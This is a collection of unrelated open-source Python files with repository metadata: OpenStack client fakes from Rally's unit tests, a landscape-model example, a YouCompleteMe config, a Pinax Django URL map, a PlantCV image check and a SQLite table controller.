healthmonitor = setup_dict(data["healthmonitor"],
required=["type", "timeout", "delay",
"max_retries"],
defaults={"admin_state_up": True})
healthmonitor_id = generate_uuid()
healthmonitor.update({"id": healthmonitor_id,
"status": "PENDING_CREATE",
"tenant_id": self.__tenant_id})
self.__healthmonitors[healthmonitor_id] = healthmonitor
return {"healthmonitor": healthmonitor}
def create_port(self, data):
port = setup_dict(data["port"],
required=["network_id"],
defaults={"name": generate_name("port_"),
"admin_state_up": True})
if port["network_id"] not in self.__networks:
raise neutron_exceptions.NeutronClientException
port_id = generate_uuid()
port.update({"id": port_id,
"status": "ACTIVE",
"binding:host_id": "fakehost",
"extra_dhcp_opts": [],
"binding:vnic_type": "normal",
"binding:vif_type": "ovs",
"device_owner": "",
"mac_address": generate_mac(),
"binding:profile": {},
"binding:vif_details": {u"port_filter": True},
"security_groups": [],
"fixed_ips": [],
"device_id": "",
"tenant_id": self.__tenant_id,
"allowed_address_pairs": []})
self.__ports[port_id] = port
return {"port": port}
def create_router(self, data):
router = setup_dict(data["router"],
defaults={"name": generate_name("router_"),
"external_gateway_info": None,
"admin_state_up": True})
router_id = generate_uuid()
router.update({"id": router_id,
"status": "ACTIVE",
"external_gateway_info": None,
"tenant_id": self.__tenant_id})
self.__routers[router_id] = router
return {"router": router}
def create_subnet(self, data):
subnet = setup_dict(
data["subnet"],
required=["network_id", "cidr", "ip_version"],
defaults={"name": generate_name("subnet_"),
"dns_nameservers": ["8.8.8.8", "8.8.4.4"]})
if subnet["network_id"] not in self.__networks:
raise neutron_exceptions.NeutronClientException
subnet_id = generate_uuid()
subnet.update({"id": subnet_id,
"enable_dhcp": True,
"tenant_id": self.__tenant_id,
"ipv6_ra_mode": None,
"allocation_pools": [],
"gateway_ip": re.sub("./.*$", "1", subnet["cidr"]),
"ipv6_address_mode": None,
"ip_version": 4,
"host_routes": []})
self.__subnets[subnet_id] = subnet
return {"subnet": subnet}
def update_resource(self, resource_id, resource_dict, data):
if resource_id not in resource_dict:
raise neutron_exceptions.NeutronClientException
        resource_dict[resource_id].update(data)
def update_network(self, network_id, data):
self.update_resource(network_id, self.__networks, data)
def update_pool(self, pool_id, data):
self.update_resource(pool_id, self.__pools, data)
def update_vip(self, vip_id, data):
self.update_resource(vip_id, self.__vips, data)
def update_health_monitor(self, healthmonitor_id, data):
self.update_resource(healthmonitor_id, self.__healthmonitors, data)
def update_subnet(self, subnet_id, data):
self.update_resource(subnet_id, self.__subnets, data)
def update_port(self, port_id, data):
self.update_resource(port_id, self.__ports, data)
def update_router(self, router_id, data):
self.update_resource(router_id, self.__routers, data)
def delete_network(self, network_id):
if network_id not in self.__networks:
raise neutron_exceptions.NeutronClientException
for port in self.__ports.values():
if port["network_id"] == network_id:
# Network is in use by port
raise neutron_exceptions.NeutronClientException
del self.__networks[network_id]
return ""
def delete_pool(self, pool_id):
if pool_id not in self.__pools:
raise neutron_exceptions.NeutronClientException
del self.__pools[pool_id]
return ""
def delete_vip(self, vip_id):
if vip_id not in self.__vips:
raise neutron_exceptions.NeutronClientException
del self.__vips[vip_id]
def delete_health_monitor(self, healthmonitor_id):
if healthmonitor_id not in self.__healthmonitors:
raise neutron_exceptions.NeutronClientException
del self.__healthmonitors[healthmonitor_id]
return ""
def delete_floatingip(self, fip_id):
if fip_id not in self.__fips:
raise neutron_exceptions.NeutronClientException
del self.__fips[fip_id]
return ""
def delete_port(self, port_id):
if port_id not in self.__ports:
raise neutron_exceptions.PortNotFoundClient
if self.__ports[port_id]["device_owner"]:
# Port is owned by some device
raise neutron_exceptions.NeutronClientException
del self.__ports[port_id]
return ""
def delete_router(self, router_id):
if router_id not in self.__routers:
raise neutron_exceptions.NeutronClientException
for port in self.__ports.values():
if port["device_id"] == router_id:
# Router has active port
raise neutron_exceptions.NeutronClientException
del self.__routers[router_id]
return ""
def delete_subnet(self, subnet_id):
if subnet_id not in self.__subnets:
raise neutron_exceptions.NeutronClientException
for port in self.__ports.values():
for fip in port["fixed_ips"]:
if fip["subnet_id"] == subnet_id:
# Subnet has IP allocation from some port
raise neutron_exceptions.NeutronClientException
del self.__subnets[subnet_id]
return ""
def list_networks(self, **search_opts):
nets = self._filter(self.__networks.values(), search_opts)
return {"networks": nets}
def list_pools(self, **search_opts):
pools = self._filter(self.__pools.values(), search_opts)
return {"pools": pools}
def list_vips(self, **search_opts):
vips = self._filter(self.__vips.values(), search_opts)
return {"vips": vips}
def list_health_monitors(self, **search_opts):
healthmonitors = self._filter(
self.__healthmonitors.values(), search_opts)
return {"healthmonitors": healthmonitors}
def list_ports(self, **search_opts):
ports = self._filter(self.__ports.values(), search_opts)
return {"ports": ports}
def list_routers(self, **search_opts):
routers = self._filter(self.__routers.values(), search_opts)
return {"routers": routers}
def list_subnets(self, **search_opts):
subnets = self._filter(self.__subnets.values(), search_opts)
return {"subnets": subnets}
def list_floatingips(self, **search_opts):
fips = self._filter(self.__fips.values(), search_opts)
return {"floatingips": fips}
def remove_interface_router(self, router_id, data):
subnet_id = data["subnet_id"]
if (router_id not in self.__routers
or subnet_id not in self.__subnets):
raise neutron_exceptions.NeutronClientException
subnet = self.__subnets[subnet_id]
for port_id, port in self.__ports.items():
if port["device_id"] == router_id:
for fip in port["fixed_ips"]:
if fip["subnet_id"] == subnet_id:
del self.__ports[port_id]
return {"subnet_id": subnet_id,
"tenant_id": subnet["tenant_id"],
"port_id": port_id,
"id": router_id}
raise neutron_exceptions.NeutronClientException
def associate_health_monitor(self, pool_id, healthmonitor_id):
if pool_id not in self.__pools:
raise neutron_exceptions.NeutronClientException
if healthmonitor_id not in self.__healthmonitors:
raise neutron_exceptions.NeutronClientException
        self.__pools[pool_id]["healthmonitors"] = healthmonitor_id
return {"pool": self.__pools[pool_id]}
def disassociate_health_monitor(self, pool_id, healthmonitor_id):
if pool_id not in self.__pools:
raise neutron_exceptions.NeutronClientException
if healthmonitor_id not in self.__healthmonitors:
raise neutron_exceptions.NeutronClientException
        del self.__pools[pool_id]["healthmonitors"]
return ""
class FakeIronicClient(object):
def __init__(self):
# TODO(romcheg):Fake Manager subclasses to manage BM nodes.
pass
class FakeSaharaClient(object):
def __init__(self):
self.job_executions = mock.MagicMock()
self.jobs = mock.MagicMock()
self.job_binary_internals = mock.MagicMock()
self.job_binaries = mock.MagicMock()
self.data_sources = mock.MagicMock()
self.clusters = mock.MagicMock()
self.cluster_templates = mock.MagicMock()
self.node_group_templates = mock.MagicMock()
self.setup_list_methods()
def setup_list_methods(self):
mock_with_id = mock.MagicMock()
mock_with_id.id = 42
        # The first call to list() returns a list with one object; the next
        # call returns an empty list (simulating the state after a delete).
self.job_executions.list.side_effect = [[mock_with_id], []]
self.jobs.list.side_effect = [[mock_with_id], []]
self.job_binary_internals.list.side_effect = [[mock_with_id], []]
self.job_binaries.list.side_effect = [[mock_with_id], []]
self.data_sources.list.side_effect = [[mock_with_id], []]
self.clusters.list.side_effect = [[mock_with_id], []]
self.cluster_templates.list.side_effect = [[mock_with_id], []]
self.node_group_templates.list.side_effect = [[mock_with_id], []]
class FakeZaqarClient(object):
def __init__(self):
self.queues = FakeQueuesManager()
def queue(self, name, **kwargs):
return self.queues.create(name, **kwargs)
class FakeTroveClient(object):
def __init__(self):
self.instances = FakeDbInstanceManager()
class FakeMistralClient(object):
def __init__(self):
self.workbook = FakeWorkbookManager()
class FakeSwiftClient(FakeObjectManager):
pass
class FakeEC2Client(object):
def __init__(self):
pass
class FakeCueClient(object):
def __init__(self):
pass
class FakeSenlinClient(object):
def __init__(self):
# TODO(Yanyan Hu):Fake interfaces of senlinclient.
pass
class FakeMagnumClient(object):
def __init__(self):
self.baymodels = FakeBaymodelManager()
class FakeWatcherClient(object):
def __init__(self):
self.strategy = FakeStrategyManager()
self.goal = FakeGoalManager()
class FakeClients(object):
def __init__(self, credential_=None):
self._nova = None
self._glance = None
self._keystone = None
self._cinder = None
self._neutron = None
self._sahara = None
self._heat = None
self._designate = None
self._ceilometer = None
self._zaqar = None
self._trove = None
self._mistral = None
self._swift = None
self._murano = None
self._monasca = None
self._ec2 = None
self._senlin = None
self._watcher = None
self._credential = credential_ or objects.Credential(
"http://fake.example.org:5000/v2.0/",
"fake_username",
"fake_password",
"fake_tenant_name")
def keystone(self):
if not self._keystone:
self._keystone = FakeKeystoneClient()
return self._keystone
def verified_keystone(self):
return self.keystone()
def nova(self):
if not self._nova:
self._nova = FakeNovaClient()
return self._nova
def glance(self):
if not self._glance:
self._glance = FakeGlanceClient()
return self._glance
def cinder(self):
if not self._cinder:
self._cinder = FakeCinderClient()
return self._cinder
def neutron(self):
if not self._neutron:
self._neutron = FakeNeutronClient()
return self._neutron
def sahara(self):
if not self._sahara:
self._sahara = FakeSaharaClient()
return self._sahara
def heat(self):
if not self._heat:
self._heat = FakeHeatClient()
return self._heat
def designate(self):
if not self._designate:
self._designate = FakeDesignateClient()
return self._designate
def ceilometer(self):
if not self._ceilometer:
self._ceilometer = FakeCeilometerClient()
return self._ceilometer
def monasca(self):
if not self._monasca:
self._monasca = FakeMonascaClient()
return self._monasca
def zaqar(self):
if not self._zaqar:
self._zaqar = FakeZaqarClient()
return self._zaqar
def trove(self):
if not self._trove:
self._trove = FakeTroveClient()
return self._trove
def mistral(self):
if not self._mistral:
self._mistral = FakeMistralClient()
return self._mistral
def swift(self):
if not self._swift:
self._swift = FakeSwiftClient()
return self._swift
def murano(self):
if not self._murano:
self._murano = FakeMuranoClient()
return self._murano
def ec2(self):
if not self._ec2:
self._ec2 = FakeEC2Client()
return self._ec2
def senlin(self):
if not self._senlin:
self._senlin = FakeSenlinClient()
return self._senlin
def watcher(self):
if not self._watcher:
self._watcher = FakeWatcherClient()
return self._watcher
class FakeRunner(object):
CONFIG_SCHEMA = {
"type": "object",
"$schema": consts.JSON_SCHEMA,
"properties": {
"type": {
"type": "string",
"enum": ["fake"]
},
"a": {
"type": "string"
},
"b": {
"type": "number"
}
},
"required": ["type", "a"]
}
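    # Example of a config that would validate against CONFIG_SCHEMA above
    # (illustrative only): {"type": "fake", "a": "foo", "b": 42}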
class FakeScenario(scenario.Scenario):
def idle_time(self):
return 0
def do_it(self, **kwargs):
pass
def with_output(self, **kwargs):
return {"data": {"a": 1}, "error": None}
def with_add_output(self):
self.add_output(additive={"title": "Additive",
"description": "Additive description",
"data": [["a", 1]],
"chart_plugin": "FooPlugin"},
complete={"title": "Complete",
"description": "Complete description",
"data": [["a", [[1, 2], [2, 3]]]],
"chart_plugin": "BarPlugin"})
def too_long(self, **kwargs):
pass
def something_went_wrong(self, **kwargs):
raise Exception("Something went wrong")
def raise_timeout(self, **kwargs):
raise multiprocessing.TimeoutError()
@scenario.configure(name="classbased.fooscenario")
class FakeClassBasedScenario(FakeScenario):
"""Fake class-based scenario."""
def run(self, *args, **kwargs):
pass
class FakeTimer(rally_utils.Timer):
def duration(self):
return 10
def timestamp(self):
return 0
def finish_timestamp(self):
return 3
@context.configure(name="fake", order=1)
class FakeContext(context.Context):
CONFIG_SCHEMA = {
"type": "object",
"$schema": consts.JSON_SCHEMA,
"properties": {
"test": {
"type": "integer"
},
},
"additionalProperties": False
}
def __init__(self, context_obj=None):
context_obj = context_obj or {}
context_obj.setdefault("config", {})
context_obj["config"].setdefault("fake", None)
context_obj.setdefault("task", mock.MagicMock())
super(FakeContext, self).__init__(context_obj)
def setup(self):
pass
def cleanup(self):
pass
@context.configure(name="fake_hidden_context", order=1, hidden=True)
class FakeHiddenContext(FakeContext):
pass
@context.configure(name="fake_user_context", order=1)
class FakeUserContext(FakeContext):
admin = {
"id": "adminuuid",
"credential": objects.Credential("aurl", "aname", "apwd", "atenant")
}
user = {
"id": "uuid",
"credential": objects.Credential("url", "name", "pwd", "tenant"),
"tenant_id": "uuid"
}
tenants = {"uuid": {"name": "tenant"}}
def __init__(self, ctx):
super(FakeUserContext, self).__init__(ctx)
self.context.setdefault("admin", FakeUserContext.admin)
self.context.setdefault("users", [FakeUserContext.user])
self.context.setdefault("tenants", FakeUserContext.tenants)
self.context.setdefault(
"scenario_name", "NovaServers.boot_server_from_volume_and_delete")
class FakeDeployment(dict):
update_status = mock.Mock()
class FakeTask(dict):
def __init__(self, task=None, temporary=False, **kwargs):
self.is_temporary = temporary
self.task = task or kwargs
self.set_failed = mock.Mock()
    def __getitem__(self, key):
        if key in self:
            # Use dict's own lookup here to avoid recursing back into __getitem__.
            return dict.__getitem__(self, key)
        return self.task[key]
def to_dict(self):
return self
| {
"content_hash": "49139e13c4e0eb3abadc32352b057aa1",
"timestamp": "",
"source": "github",
"line_count": 1799,
"max_line_length": 81,
"avg_line_length": 29.5964424680378,
"alnum_prop": 0.5903012546014574,
"repo_name": "vganapath/rally",
"id": "4c195b6c01a0720bc4ad2cb59105ac220dc96fd2",
"size": "53874",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/fakes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "52008"
},
{
"name": "JavaScript",
"bytes": "8550"
},
{
"name": "Mako",
"bytes": "18645"
},
{
"name": "Python",
"bytes": "3621510"
},
{
"name": "Shell",
"bytes": "43808"
}
],
"symlink_target": ""
} |
"""
Hillslope & uplift example case for PY_ICE_CASCADE landscape evolution model
"""
import py_ice_cascade
import numpy as np
def run_example():
"""
Run hillslope diffusion with uplift example, save results to file, and
return output file name
"""
ny = 50
nx = 100
lx = 1.0
delta = lx/(nx-1)
ly = delta*(ny-1)
x = np.linspace(0, lx, nx)
y = np.linspace(0, ly, ny)
zrx = np.pad(np.random.rand(ny-2, nx-2), 1, 'constant', constant_values=0)
time_start = 0.0
time_step = 0.1
num_steps = 10
time_end = time_start + time_step*(num_steps-1)
out_steps = np.arange(0,num_steps)
hill_mask = np.ones((ny, nx))
hill_kappa_active = 0.01
hill_kappa_inactive = 0.0
hill_bc = ['constant']*4
uplift_start = np.zeros((ny,nx), dtype=np.double)
uplift_end = np.ones((ny,nx), dtype=np.double)
output_filename = 'example.hill_uplift.out.nc'
hill = py_ice_cascade.hillslope.ftcs_model(zrx, hill_mask, delta, hill_kappa_active,
hill_kappa_inactive, hill_bc)
uplift = py_ice_cascade.uplift.linear_model(zrx, uplift_start, uplift_end, time_start, time_end)
mod = py_ice_cascade.main_model(hill, uplift,
x, y, zrx, time_start, time_step, num_steps, out_steps)
mod.run(output_filename, clobber=True)
return output_filename
if __name__ == '__main__':
run_example()
| {
"content_hash": "73169e9f2694aec34ac80f4f7a7c4664",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 100,
"avg_line_length": 29.425531914893618,
"alnum_prop": 0.6290672451193059,
"repo_name": "keithfma/py_ice_cascade",
"id": "c189062909a024372c067b413c91b37caf13ecf0",
"size": "1383",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py_ice_cascade/examples/hill_uplift.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "659"
},
{
"name": "Python",
"bytes": "58223"
}
],
"symlink_target": ""
} |
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
'-fexceptions',
'-DNDEBUG',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++11',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
'-isystem',
'/usr/include',
'-isystem',
'/usr/local/include',
'-isystem',
'/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/../lib/c++/v1',
'-isystem',
'/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/include',
'-I',
'/home/zrb/src/edk2/MdePkg/Include'
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
# This is the entry point; this function is called by ycmd to produce flags for
# a file.
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return { 'flags': final_flags }
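# Minimal manual check (illustrative only -- ycmd normally imports this file and
# calls FlagsForFile itself; 'main.cpp' below is a hypothetical filename):
if __name__ == '__main__':
  import pprint
  pprint.pprint( FlagsForFile( os.path.join( DirectoryOfThisScript(), 'main.cpp' ) ) )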
| {
"content_hash": "56f42ef53e57d251e776d1964fbc9d97",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 103,
"avg_line_length": 33.265625,
"alnum_prop": 0.6930483795209018,
"repo_name": "RongbinZhuang/simpleOS",
"id": "189f2873dc7bf90eaf0e08ca2904e14a648802a6",
"size": "4935",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Alpha/.ycm_extra_conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "5124957"
},
{
"name": "Batchfile",
"bytes": "70"
},
{
"name": "C",
"bytes": "6937758"
},
{
"name": "C++",
"bytes": "6770687"
},
{
"name": "HTML",
"bytes": "7719"
},
{
"name": "Makefile",
"bytes": "242586"
},
{
"name": "Objective-C",
"bytes": "10667"
},
{
"name": "Python",
"bytes": "36815"
},
{
"name": "Roff",
"bytes": "4328"
},
{
"name": "Shell",
"bytes": "27093"
},
{
"name": "SourcePawn",
"bytes": "80688"
}
],
"symlink_target": ""
} |
from django.conf.urls.defaults import *
from django.conf import settings
from django.views.generic.simple import direct_to_template
from django.contrib import admin
from account.openid_consumer import PinaxConsumer
import os.path
from microblogging.feeds import TweetFeedAll, TweetFeedUser, TweetFeedUserWithFriends
tweets_feed_dict = {"feed_dict": {
'all': TweetFeedAll,
'only': TweetFeedUser,
'with_friends': TweetFeedUserWithFriends,
}}
from blog.feeds import BlogFeedAll, BlogFeedUser
blogs_feed_dict = {"feed_dict": {
'all': BlogFeedAll,
'only': BlogFeedUser,
}}
from bookmarks.feeds import BookmarkFeed
bookmarks_feed_dict = {"feed_dict": { '': BookmarkFeed }}
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', direct_to_template, {"template": "homepage.html"}, name="home"),
(r'^about/', include('about.urls')),
(r'^account/', include('account.urls')),
(r'^openid/(.*)', PinaxConsumer()),
(r'^bbauth/', include('bbauth.urls')),
(r'^authsub/', include('authsub.urls')),
(r'^profiles/', include('profiles.urls')),
(r'^blog/', include('blog.urls')),
(r'^tags/', include('tag_app.urls')),
(r'^invitations/', include('friends_app.urls')),
(r'^notices/', include('notification.urls')),
(r'^messages/', include('messages.urls')),
(r'^announcements/', include('announcements.urls')),
(r'^tweets/', include('microblogging.urls')),
(r'^tribes/', include('tribes.urls')),
(r'^projects/', include('projects.urls')),
(r'^comments/', include('threadedcomments.urls')),
(r'^robots.txt$', include('robots.urls')),
(r'^i18n/', include('django.conf.urls.i18n')),
(r'^bookmarks/', include('bookmarks.urls')),
(r'^admin/(.*)', admin.site.root),
(r'^photos/', include('photos.urls')),
(r'^avatar/', include('avatar.urls')),
(r'^swaps/', include('swaps.urls')),
(r'^flag/', include('flag.urls')),
(r'^schedule/', include('schedule.urls')),
(r'^locations/', include('locations.urls')),
(r'^feeds/tweets/(.*)/$', 'django.contrib.syndication.views.feed', tweets_feed_dict),
(r'^feeds/posts/(.*)/$', 'django.contrib.syndication.views.feed', blogs_feed_dict),
(r'^feeds/bookmarks/(.*)/?$', 'django.contrib.syndication.views.feed', bookmarks_feed_dict),
)
## @@@ for now, we'll use friends_app to glue this stuff together
from photos.models import Photo
friends_photos_kwargs = {
"template_name": "photos/friends_photos.html",
"friends_objects_function": lambda users: Photo.objects.filter(member__in=users),
}
from blog.models import Post
friends_blogs_kwargs = {
"template_name": "blog/friends_posts.html",
"friends_objects_function": lambda users: Post.objects.filter(author__in=users),
}
from microblogging.models import Tweet
friends_tweets_kwargs = {
"template_name": "microblogging/friends_tweets.html",
"friends_objects_function": lambda users: Tweet.objects.filter(sender_id__in=[user.id for user in users], sender_type__name='user'),
}
from bookmarks.models import Bookmark
friends_bookmarks_kwargs = {
"template_name": "bookmarks/friends_bookmarks.html",
"friends_objects_function": lambda users: Bookmark.objects.filter(saved_instances__user__in=users),
"extra_context": {
"user_bookmarks": lambda request: Bookmark.objects.filter(saved_instances__user=request.user),
},
}
urlpatterns += patterns('',
url('^photos/friends_photos/$', 'friends_app.views.friends_objects', kwargs=friends_photos_kwargs, name="friends_photos"),
url('^blog/friends_blogs/$', 'friends_app.views.friends_objects', kwargs=friends_blogs_kwargs, name="friends_blogs"),
url('^tweets/friends_tweets/$', 'friends_app.views.friends_objects', kwargs=friends_tweets_kwargs, name="friends_tweets"),
url('^bookmarks/friends_bookmarks/$', 'friends_app.views.friends_objects', kwargs=friends_bookmarks_kwargs, name="friends_bookmarks"),
)
if settings.SERVE_MEDIA:
urlpatterns += patterns('',
(r'^site_media/(?P<path>.*)$', 'misc.views.serve')
)
| {
"content_hash": "30e5b94e6e928f88722fedb991f408f4",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 138,
"avg_line_length": 38.27358490566038,
"alnum_prop": 0.6736504806507272,
"repo_name": "ingenieroariel/pinax",
"id": "b031d716fc8f8936af3af8d6db957424ca535034",
"size": "4057",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "projects/complete_project/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "3140"
},
{
"name": "Python",
"bytes": "520245"
}
],
"symlink_target": ""
} |
import numpy as np
from plantcv.plantcv import fatal_error
from plantcv.plantcv import outputs
def within_frame(mask, border_width=1, label="default"):
"""
    This function tests whether the plant touches the edge of the image, in order to determine whether it is completely within the field of view.
Input:
mask = a binary image of 0 and nonzero values
border_width = distance from border of image considered out of frame (default = 1)
label = optional label parameter, modifies the variable name of observations recorded
Returns:
in_bounds = a boolean (True or False) confirming that the object does not touch the edge of the image
:param mask: numpy.ndarray
:param border_width: int
:param label: str
:return in_bounds: bool
"""
# Check if object is touching image boundaries (QC)
if len(np.shape(mask)) > 2 or len(np.unique(mask)) > 2:
fatal_error("Mask should be a binary image of 0 and nonzero values.")
# First column
first_col = mask[:, range(0, border_width)]
# Last column
last_col = mask[:, range(-border_width, 0)]
# First row
first_row = mask[range(0, border_width), :]
# Last row
last_row = mask[range(-border_width, 0), :]
border_pxs = np.concatenate([first_col.flatten(), last_col.flatten(), first_row.flatten(), last_row.flatten()])
out_of_bounds = bool(np.count_nonzero(border_pxs))
in_bounds = not out_of_bounds
outputs.add_observation(sample=label, variable='in_bounds', trait='whether the plant goes out of bounds ',
method='plantcv.plantcv.within_frame', scale='none', datatype=bool,
value=in_bounds, label='none')
return in_bounds
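# A minimal usage sketch (illustrative only; the demo mask, border width and
# label below are made-up values, not part of PlantCV itself):
if __name__ == "__main__":
    demo_mask = np.zeros((10, 10), dtype=np.uint8)
    demo_mask[2:8, 2:8] = 255  # plant region sits well inside the frame
    print(within_frame(demo_mask, border_width=1, label="demo"))  # expected: True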
| {
"content_hash": "75a33cf651611c0220ff677069966f21",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 116,
"avg_line_length": 36.702127659574465,
"alnum_prop": 0.6562318840579711,
"repo_name": "danforthcenter/plantcv",
"id": "74d2b638834e7bacd33387bf3ba4f1c9921a5b43",
"size": "1762",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "plantcv/plantcv/within_frame.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "1112"
},
{
"name": "Python",
"bytes": "898011"
},
{
"name": "R",
"bytes": "1327"
},
{
"name": "Shell",
"bytes": "3348"
}
],
"symlink_target": ""
} |
"""
The database table controller.
"""
import logging
from sqlite3 import Connection
from typing import Any, Mapping
from snippy.data.dbtypes import Table
from snippy.data.sqlgenerator import SqlGenerator
from snippy.data.sqlite import Sqlite
from snippy.utils.loggingtools import get_logger
class TableController:
"""Controls data access and manipulation for a given table.
:param db_conn: Database connection
:type db_conn: sqlite3.Connection
:param table: Database table
:type table: snippy.data.dbtypes.Table
"""
def __init__(self, db_conn: Connection, table: Table):
self._db_conn = db_conn
self._table = table
self._sql_gen = SqlGenerator(table)
self._logger = get_logger('tablecontroller', logging.DEBUG)
def create_table(self, clobber: bool=False):
"""Creates a table.
:param clobber: Flag indicating to overwrite existing table
:type clobber: bool
"""
if clobber:
sql = self._sql_gen.get_drop_table_sql()
Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Dropped table %s", self._table.name)
sql = self._sql_gen.get_create_table_sql()
Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Created table %s", self._table.name)
def insert_row(self, row: Mapping[str, Any]):
"""Inserts a row.
:param row: Table row
:type row: dict(str, [column datatype])
"""
sql = self._sql_gen.get_insert_row_sql()
Sqlite.execute_sql(self._db_conn, sql, row)
# TODO: get row id from insert
self._logger.info("Inserted row [...]")
def update_row(self, rowid: int, row: Mapping[str, Any]):
"""Updates a row.
:param rowid: Table row ID
:type rowid: int
:param row: Table row
:type row: dict(str, [column datatype])
"""
row['rowid'] = rowid
sql = self._sql_gen.get_update_row_sql()
Sqlite.execute_sql(self._db_conn, sql, row)
self._logger.info("Updated row %s", rowid)
def delete_row(self, rowid: int):
"""Deletes a row.
:param rowid: Table row ID
:type rowid: int
"""
sql = self._sql_gen.get_delete_row_sql()
Sqlite.execute_sql(self._db_conn, sql, {'rowid': rowid})
self._logger.info("Deleted row %s", rowid)
def delete_all_rows(self):
"""Deletes all rows."""
sql = self._sql_gen.get_delete_all_rows_sql()
Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Deleted all rows")
def query_all_rows(self):
"""Returns all rows."""
sql = self._sql_gen.get_query_all_rows_sql()
query_results = Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Queried all rows")
return query_results
def query_row_by_value(self, column_name: str, value: Any):
"""Returns all rows with a given column value.
:param column_name: Column name
:type column_name: str
:param value: Search value
:type value: [Column datatype]
"""
sql = self._sql_gen.get_query_row_by_value_sql(column_name, value)
query_results = Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Queried rows with %s = %s", column_name, value)
return query_results
# def table_exists(self, table_name):
# sql = ("SELECT name FROM sqlite_master "
# "WHERE type = 'table' AND name = 'table_name';")
# table_names = Sqlite.execute_sql(self._db_conn, sql)
# print table_names
# return table_name in table_names
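# A minimal usage sketch (illustrative only; the Table construction is a
# placeholder -- see snippy.data.dbtypes for the real column definitions):
#
#     import sqlite3
#     conn = sqlite3.connect(":memory:")
#     snippet_table = Table(...)  # name and columns elided
#     controller = TableController(conn, snippet_table)
#     controller.create_table(clobber=True)
#     controller.insert_row({"title": "hello", "body": "print('hi')"})
#     rows = controller.query_all_rows()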
| {
"content_hash": "53c16b7e946c6f2330ee04c94b507a7c",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 74,
"avg_line_length": 35.66981132075472,
"alnum_prop": 0.5879396984924623,
"repo_name": "pauljxtan/snippy",
"id": "e4c2a7fd708c5705bf7de014dfe7f8ac172828b3",
"size": "3781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "snippy/logic/tablecontroller.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "36582"
}
],
"symlink_target": ""
} |
import unittest
from robot.reporting.jsexecutionresult import JsExecutionResult
from robot.reporting.jswriter import JsResultWriter
from robot.utils import StringIO
from robot.utils.asserts import assert_equal, assert_true
